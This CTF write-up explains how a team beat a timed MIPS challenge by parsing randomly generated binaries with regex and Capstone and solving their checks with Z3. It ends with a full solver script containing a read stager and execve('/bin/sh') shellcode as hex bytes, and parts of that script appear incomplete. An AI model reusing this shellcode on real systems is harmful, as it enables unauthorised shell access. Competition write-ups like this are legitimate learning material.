This wound up being an awesome team effort to solve the challenge in the last six minutes of the competition. The last few minutes were REALLY intense and Robert went into overdrive while getting me some functional shellcode.

> Robert: JUST RUN THIS 
> Me:     How many zeros? 
> Robert: LOTS 
> Me:     Like more than 256? 
> Robert: *pastes padded shellcode into slack*
> Robert: RUN THIS 
> Me:     Holy crap it worked *tears of joy*

I had a lot of fun working on this problem and those last few moments were definitely to remember.

First thoughts

After submitting the hashcat proof of work, the server sent a large base64 blob, titled “Binary Dump”.

Binary Dump:

Then printed a scoreboard and a prompt Faster >

Rank(Refresh Every Min)
1st. n132(1000)
2ed. (2549796)
3th. (2602650)
________         ____        __    _____
\______ \   ____/_   | _____/  |__/ ____\
|    |  \_/ __ \|   |/ ___\   __\   __\
|    `   \  ___/|   \  \___|  |  |  |
/_______  /\___  >___|\___  >__|  |__|
       \/     \/         \/
---------------Code Runner---------------
Faster >

And that was it, the server just waited for input. If I sent some random text, say AAAA, the server just closed the connection.

So the next step was to take a look at that base64 blob to see what it was.

b64d(blob) returned a Gzip file, and gzip.decompress(b64d(blob)) returned an ELF 32-bit MIPS program!

In Ghidra:

Ghidra main function

The main function was pretty straight forward,

Basically it timed you on how long it took to execute the function highlighted in blue and if it returned non-zero you got to execute whatever you wanted!

Seemed pretty easy so far.

So I needed to figure out

Following the call chain

Here’s the blue highlighted function:


It read up to 256 bytes from the user into a stack buffer then called another function with a pointer to the buffer.

The next function:

xor function

If this function returned 0, then the parent would’ve also returned 0, and subsequently, execution would’ve never reached the part where it executed whatever I gave it. So I needed to stay away from the return 0 scenario. This meant going deeper in the call chain.

The next function:

and function

And the pattern repeated, it checked 4 bytes then called another function if the bytes were good, although the structure of the checks were a bit different.

I followed these function calls about 16 levels deep until I finally got to this

end function

which returned 0xc001babe, a non-zero value!

So I needed to send 16*4 bytes, such that they satisfied the tests in the 16 functions.

So far this problem didn’t look too bad, especially since the chunks of 4 bytes were independent of one another. I could’ve easily run this through Angr or constructed Z3 formulas by hand to solve this.

But of course there was catch, on each new connection to the server, you got a different binary, one where the checks in the 16 functions were slightly different.

But still, it wasn’t necessarily that bad. With angr, I could’ve easily solved for the satisfying input for every new binary the server gave me.

So all that was left to fully understand this challenge, was to determine how quickly a satisfying solution needed to be computed.

Reading Ghidra’s decompiled output for the time calculations was pretty confusing to me and I didn’t feel like trying to understand it. I figured since I’d probably need to run the program at some point anyway, I’d just run it and determine the time constraint empirically.

At this point I had saved a few of the binaries the server had given me and was reusing them for testing.

In order to get to the part of the program where the time calculations happened, I needed to have a satisfying set of 64 bytes to feed it. Here I thought of a couple options:

Because I didn’t know much about MIPS, in particular syscall numbers, compilers, etc. and didn’t feel like spending any time figuring it out, I just used Angr, which I was already quite familiar with.

Here’s roughly what I had — I deleted the original :(

p = angr.Project("./code.0")
myinput = BVS("myinput", 8*64)
state = p.factory.blank_state(addr=START_OF_16_FUNCS), myinput)
state.regs.a0 = MYINPUT_ADDR
sm = p.factory.simulation_manager(state)
sm.explore(find=LAST_OF_16_FUNC, avoid=RETURN_0)
print(sm.found[0].solver.eval(myinput, cast_to=bytes))

That gave me the 64 bytes I needed to get to the second part of the program!

Then I just needed to run it. I first had to configure binfmt and qemu for running dynamically linked MIPS binaries. This meant installing libc for MIPS and doing some magic symlinking for binfmt. Zach Riggle’s Stackexchange answer was a great reference here.

This is where I learned how much time I actually had and I was pretty shocked. I had started this CTF a bit late, and started working on this question about 18 hours into the competition and at this point the problem only had 4 solves, so I knew this was going to be really hard, but nevertheless, I was shocked that it was even possible.

1.1 seconds

That Angr script I mentioned above, that took somewhere between

10-20 seconds

To understand this madness, we need to look at it a bit deeper.

After the server receives your proof of work and verifies that it’s correct, it base64(gzip())s the binary, then writes the data to its TCP socket connected to you. Since write or send to a socket is non-blocking (in the sense that it doesn’t wait for a message received confirmation from the receiver), the server immediately continues execution before you’ve even received the base64 binary. The server then presumably calls execve with the binary it sent you, hooking up its stdin/stdout to the socket. Now the binary is executing — it calls gettimeofday, then prompts you for the 64 bytes. At this point you haven’t even received the binary yet and the clock is already ticking.

So how much of the precious 1.1 seconds was I losing just to network latency?

ping from my place in Vancouver, BC, Canada was about 390ms average and 250ms minimum.

So in best case it would’ve taken 250ms to receive the binary, then another 250ms for the server to receive my 64 bytes. So the best scenario was 500ms just for network communication. That left just

600 ms

But that was assuming that I connected from Vancouver…

I googled “ping test location” or something like that and it lead to a website that pinged a target IP from several locations around the world and returned the time for each ping. Turned out that the server was in Tokyo, so I spun up an AWS instance in the Tokyo region and found that I could get ping replies in 60ms average with low variance. So that brought down the network latency issue to around 120ms, much better.

That meant I had under 1 second to compute a 64 byte solution, not including the time it took to actually run the code between the two gettimeofday calls — which was surprisingly high on my machine with qemu-mips.

Here I sat and thought for a while…

Angr clearly wasn’t going to work in the usual way that it’s used. But maybe I could dig down into some of the lower level components and figure out how to use only the bits that are important for our problem? Maybe by stripping out extra bulk I could make it faster?

Angr is an amazing tool that does alot. It tracks memory, registers, executes code, builds symbolic constraints, solves them, etc. Setting up the data structures for all these things and executing the code takes a while, and we really don’t need most of it.

I decided that personally, I wasn’t interested in digging deep into the inner workings of Angr to figure this out, and in hindsight, I think it wouldn’t have worked anyway and I would’ve wasted a bunch of time. Maybe Shellpish has some different thoughts on that? They are the authors of Angr and they were one of the teams that solved this challenge… so I’d be curious to hear what they did.

So I had to come up with some other way. This lead me back to analyzing the binaries I got from the server.

I took a close look at the 16 functions, and noticed that some of them had exactly the same structure, just some of the constants and comparison directions were different.

For example:

a b

This is where it was helpful to speculate how the server might have been generating these binaries. I figured it was probably using some template C source code, substituting in random choices for template variables (random while still being satisfiable), compiling it, then sending it over.

There were only 5 function templates that the problem authors used.

So all I needed to do was identify which of the 5 templates each function corresponded to, extract the template “variables” from the functions, and substitute the variables into a Z3 expression for the corresponding template. Then get Z3 to solve the constraints.

Basically I needed to write 5 Z3 reimplementations of the function templates that took the template variables as arguments.

So that was the plan. I got in touch with Robert to get some affirmation that this actually made sense. He helped me break down some of the differences between the functions even further. He mentioned that he had solved some challenges like this with regex, although not under such time constraints.

Finding the patterns

With Robert’s help we found several patterns in the binaries that drastically simplified the solution in the end.

The 16 functions were always adjacent in the file

The functions were ordered in the reverse order in which they were called.

Each function had a deterministic structure. It started with a simple function prelude that saved the return address, and ended with a jr return instruction. The return instruction always appeared exactly right before the start of the next function’s prelude. Compilers don’t always do this.

This made identifying function boundaries very easy.

Their compiler was being very kind here… optimizations were probably off :)

So all I needed to do was find the offset where the deepest function in the call chain was stored, then consume instructions forward, stopping at every jr return instruction to record the end of a function, and so on, stopping after consuming 16 functions.

Identifying function templates

I noticed that functions from a particular template were always roughly the same size (within ~20 bytes).

I also noticed that the size ranges for the templates were disjoint.

So that’s it. All I had to do was define a size range for each template, and match functions against the size range.

Parsing out the template variables

Note: I used Capstone to disassemble the code. This made regex matching easier.

Once the functions were identified, I then needed to parse out the template variables.

For example, here I needed to extract the buffer indices, and the constant values in the comparisons:

analyze instructions analyze instructions

Robert pointed out that the compiler was really kind to us here and used completely predictable instructions for loading bytes from the stack buffer and for loading constants into registers. The order in which these operations happened was also always exactly the same for each binary. Once again, the problem authors probably turned off compiler optimizations.

For example, this regex could extract all the buffer indices:

idx_pattern = re.compile(
       r"lw ..., 0x20\(\$fp\);"
        "(?:addiu ..., ..., ([1234]);)?"
        "lbu ..., \(...\)")

In summary, I just needed to identify the template for each function then extract the template variables with regex.

Solving the constraints

Then I just needed to use the extracted values to solve for a satisfying solution. There were only 5 function templates, so I wrote a Z3 reimplementation for each one that took the extracted template variables as arguments.

Here’s one of them

z3_expr = Not(Or(
 np() + np() == nc(),
 np() + np() == nc(),
 np() + np() == nc(),

where np() and nc() fetch the next buffer byte and next constant.

or function

I created 4 symbolic bytes, then just copied what the code did. I.e., add two bytes and compare to a constant.


I tested my solver locally using these two wonderful qemu commands

qemu-mipsel -strace ./code   # strace
qemu-mipsel -g 5000 ./code   # gdb

My solution ran in about 400ms (just to compute the solution, nothing else). This was much faster than it needed to be, but with the network latency between Tokyo and Vancouver, it actually didn’t work most of the time when connecting to the server from Vancouver.

At this point there was only 1 hour left, I wanted to get a setup running on an AWS instance in Japan so it could run more consistently, and I also needed some MIPS shellcode. I hit up Daniel and Robert to help me get some shellcode running while I got the server set up.

A funny trick they put in the binary was that the faster it ran, the more shellcode you got to write.

Time – Bytes of shellcode
1.3s 4
1.0s 16
0.8s 24
0.6s 32

I was rushing and wasn’t really sure how fast it was going to run on the AWS instance, so Robert made no assumptions about how much shellcode we were going to get. He assumed at the very least, we would have 12 bytes. So he designed some code that calls read to read in even more shellcode, then we would send a full execve("/bin/sh", NULL, NULL) payload on the second read.

The trick to calling read with only 12 bytes (3 MIPS instructions), was to notice that the binary immediately executed your shellcode after calling read.

call shellcode

This meant that the argument registers from the read call were left unchanged when calling your shellcode, i.e., a0 was still 0 (stdin) and a1 was still the stack buffer. All we wanted to change, was the number of bytes to read.

So basically the 12 byte shellcode just needed to set a2 = 0xff, set v0 (the syscall register) to SYS_READ and execute syscall :)

addi    a2, zero, 256
li      v0, 4003

Robert confirmed that the 12 byte read code definitely worked, and all we needed was some MIPS code that called execve("/bin/sh", NULL, NULL). He tried using pwntools asm( and it didn’t work for some reason.

At this point there were 6 minutes left.

I had the AWS instance all set up, I had connected to the server, solved the constraints, sent the 64 bytes, sent the 12 byte read shellcode, and had called IPython.embed(), so I just had a Python prompt in front of me and didn’t actually know if the 12 byte read code worked or whether the connection was still open.

My next step was to give asm( a try myself, in case Robert forgot to set the architecture context.arch = "mips".

Meanwhile Robert was pulling random MIPS shellcode off the internet and sending it to me.

He pasted some space separated hex shellcode into Slack and said “RUN THIS”.

I pasted it into my Python prompt, not bothering to cut out the spaces, hoping that bytes.fromhex could handle it.

paste shellcode

And it worked!


Thanks random internet shellcode!

Turns out asm( execs this




In the end I had about 600 lines of Python to solve this challenge and it took a while to debug. I definitely over-engineered some parts of it and the code could’ve been a lot DRYer.

The code I used during the CTF definitely didn’t make enough use of regex. Originally my template variable extraction implementation was about 80 lines of code. I later rewrote it with pure regex, bringing it down to 15 lines. It was significantly faster and easier to implement that way. Not only was I not writing an extra 65 lines of code, I also wasn’t debugging it when it broke :)

After all, regex is a super specialized and expressive language for pattern matching, and in this case, that was exactly what the problem demanded. So pure regex should’ve been a natural choice for me.

Anyway, I’m definitely going to lean heavily on regex for future challenges like this.

Another mistake I made was not casting my Z3 BitVecs up to 32 bits prior to multiplying them, like how they were casted in the decompiled output:

uint cast

So I was overflowing unknowingly and Z3 was giving solutions that didn’t work against the binary.

Here’s where I fixed it:

zero extend

Only the Bare minimum


There’s a common pattern in problems like this, where you’re trying to code as fast as possible, with minimal bugs along the way.

I think the trick to quickly implementing solutions for problems like this comes down to how well you identify the common patterns and simplicities in the problem.

If you fail to find the “simple” solution, or the common patterns, then you end up writing code for a more general case that’s not actually important for the immediate problem at hand.

I am by no means great at identifying the simple solutions. I often default to implementing the more general case, subsequently taking longer. But I’m working on it.


For the CTF I used a 600 line over-engineered monster Python program. After reflecting on it, it became clear that most of those lines were extra bulk that didn’t need to be there.

With the benefit of hindsight, I went ahead and implemented a far simpler solution.

By making lots of little helper functions, leaning heavily into regex, and sticking with only basic data structures (lists), this implementation was much easier and faster to write.

#!/usr/bin/env python
from pwn import *
from capstone import *
from IPython import embed
from ipdb import set_trace
from z3 import BitVec, BitVecVal, And, Or, Xor, If, Solver, Not, ZeroExt, Extract
import re
import gzip
import time
import itertools
from hashlib import sha256
context.arch = "mips"
end_func_bytes = bytes.fromhex("f8ffbd270400beaf25f0a0030800c4af01c0023cbeba423425e8c0030400be8f0800bd270800e00300000000")
r = None
def get_binary():
   global r
   r = remote("", 9999)
   r.recvuntil("hexdigest() == ")
   hexhash = r.recvline().strip(b"\n\"").decode("ascii")
   for s in [bytes(x) for x in itertools.permutations(range(0, 256), 3)]:
       if sha256(s).hexdigest() == hexhash:
       assert 0
   r.recvuntil("Binary Dump:\n")
   hexcode = r.recvline().strip(b"\n")
   gzipcode = b64d(hexcode)
   code = gzip.decompress(gzipcode)
   return code
def test_range(func, r):
   return r[0] <= len(func)*4 <= r[1]
def extract_template_vars(func):
   insts = ";".join([f"{inst[2]} {inst[3]}" for inst in func])
   idx_pattern = re.compile(
           r"lw ..., 0x20\(\$fp\);"
            "(?:addiu ..., ..., ([1234]);)?"
            "lbu ..., \(...\)")
   idxs = [int(i or "0") for i in idx_pattern.findall(insts)]
   const_pattern = re.compile(r"addiu \$v\d, \$zero, (0x)?(.+?);")
   consts = [int(n, 16 if base16 else 10) for base16, n in const_pattern.findall(insts)]
   cmp_pattern = re.compile(
           r"negu \$v\d, \$v\d;"
           "slt ..., ..., ...;"
   cmps = cmp_pattern.findall(insts)
   return (iter(idxs), iter(consts), iter(cmps))
def solve_func(func):
   def np():
       return p[next(idxs)]
   def nc():
       return next(consts)
   s = Solver()
   p = [BitVec(f"p{i}", 32) for i in range(4)]
   s.add(*[pp <= 255 for pp in p])
   s.add(*[pp >= 0   for pp in p])
   idxs, consts, cmps = extract_template_vars(func)
   if test_range(func, [190, 210]):
       z3_expr = Not(Or(
           np() + np() == nc(),
           np() + np() == nc(),
           np() + np() == nc(),
   elif test_range(func, [250, 280]):
       z3_expr = And(
           np() ^ np() == nc(),
           np() == nc(),
           np() == ( ( ( np() ^ np() ) & 0x7f ) << 1 ),
           np() == ( np() ^ np() ^ np() )
   elif test_range(func, [176, 184]):
       z3_expr = And(
           np() == np(),
           np() == np(),
           np() == nc(),
           np() == nc(),
   elif test_range(func, [308, 328]):
       def trunc(x):
           return Extract(7, 0, x) # Cast to byte
       z3_expr = And(
           np() == nc(),
           np() == nc(),
           trunc(np()) == trunc(np())*trunc(np()),
           trunc(np()) == ( trunc(np())*trunc(np()) +
                            trunc(np())*trunc(np()) -
                            trunc(np())*trunc(np()) ),
   elif test_range(func, [300, 304]):
       z3_expr = And(
           np() + np() + np() == nc(),
           np() + np() + np() == nc(),
           np() + np() + np() == nc(),
           np() + np() + np() == nc(),
   elif test_range(func, [440, 444]):
       def Abs(x):
           return If(x >= 0, x, -x)
       def F():
           return Abs(np() * np() - np() * np())
       i1 = F()
       i2 = F()
       c2 = If(next(cmps) == "beqz", i1 < i2, i1 >= i2)
       i1 = F()
       i2 = F()
       c1 = If(next(cmps) == "beqz", i1 < i2, i1 >= i2)
       z3_expr = And(c1, c2)
       assert 0, f"{len(func)} {func}"
   m = s.model()
   return bytes([m.eval(pp).as_long() for pp in p])
if __name__ == "__main__":
   # filename = "code.3"
   # with open(filename, "rb") as f:
   #     elf =
   # r = process(f"qemu-mipsel -strace ./{filename}", shell=True)
   elf = get_binary()
   m =, elf)
   assert m
   start = m.span()[1]
   code = elf[start:]
   funcs = []
   func = []
   insts = md.disasm_lite(elf[start:], 0)
   for inst in insts:
       if inst[2] == "jr":
           if len(funcs) == 16:
           func = []
   solution = b""
   for func in reversed(funcs):
       solution += solve_func(func)
   read_shellcode = bytes.fromhex("00 01 06 20 A3 0F 02 24 0C 00 00 00")
   shellcode = bytes.fromhex("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 73 06 24 FF FF D0 04 50 73 0F 24 FF FF 06 28 E0 FF BD 27 D7 FF 0F 24 27 78 E0 01 21 20 EF 03 E8 FF A4 AF EC FF A0 AF E8 FF A5 23 AB 0F 02 24 0C 01 01 01 2F 62 69 6E 2F 73 68 00")